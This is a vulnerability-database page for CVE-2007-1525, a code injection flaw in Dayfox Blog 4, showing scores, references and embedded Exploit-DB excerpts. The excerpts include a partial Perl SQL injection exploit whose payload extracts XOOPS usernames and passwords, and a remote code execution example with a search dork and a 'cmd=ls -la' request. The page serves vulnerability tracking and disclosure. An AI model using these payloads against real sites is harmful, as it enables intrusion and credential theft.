CVE-2007-1525
published 2007-03-20CVE-2007-1525: Direct static code injection vulnerability in postpost.php in Dayfox Blog (dfblog) 4 allows remote attackers to execute arbitrary PHP code via the cat…
PriorityP356medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
36.97%
98.3th percentile
Direct static code injection vulnerability in postpost.php in Dayfox Blog (dfblog) 4 allows remote attackers to execute arbitrary PHP code via the cat parameter, which can be executed via a request to posts.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dayfox_designs | dayfox_blog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection
exploitdb·2007-04-04
CVE-2007-1960 XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection
XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module Rha7 Downloads 1.0 (visit.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.rha7.com/ , www.xoops.org/modules/repository/singlefile.php?cid=92&lid=1525
#[$$ : Free
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2%20from%20xoops_users%20where%20uid%20like%20".$id.$kap
Exploit-DB
Dayfox Blog 4 - 'postpost.php' Remote Code Execution
exploitdb·2007-03-14
CVE-2007-1525 Dayfox Blog 4 - 'postpost.php' Remote Code Execution
Dayfox Blog 4 - 'postpost.php' Remote Code Execution
---
)_/ \ /
(@
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
# Portal : Dayfox Blog V 4
# Download : http://www.dayfoxdesigns.co.nr
# Dork : "Powered by Dayfox Designs"
# Author : Dj7xpl | [email protected]
# Risk : High (Remote Code Execution)
#
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
#
#
# 1- Insert Your Script In Text File By This Exploit Example:
# 2- include Text File By (Posts.php) Example: http://localhost/dfblog/posts.php?cmd=ls -la
#
#
+_________
No writeups or analysis indexed.
http://infusion.110mb.com/enter/dfblog4.ziphttp://osvdb.org/34073http://secunia.com/advisories/24534http://www.securityfocus.com/bid/22972http://www.vupen.com/english/advisories/2007/0969https://www.exploit-db.com/exploits/3478http://infusion.110mb.com/enter/dfblog4.ziphttp://osvdb.org/34073http://secunia.com/advisories/24534http://www.securityfocus.com/bid/22972http://www.vupen.com/english/advisories/2007/0969https://www.exploit-db.com/exploits/3478
2007-03-20
Published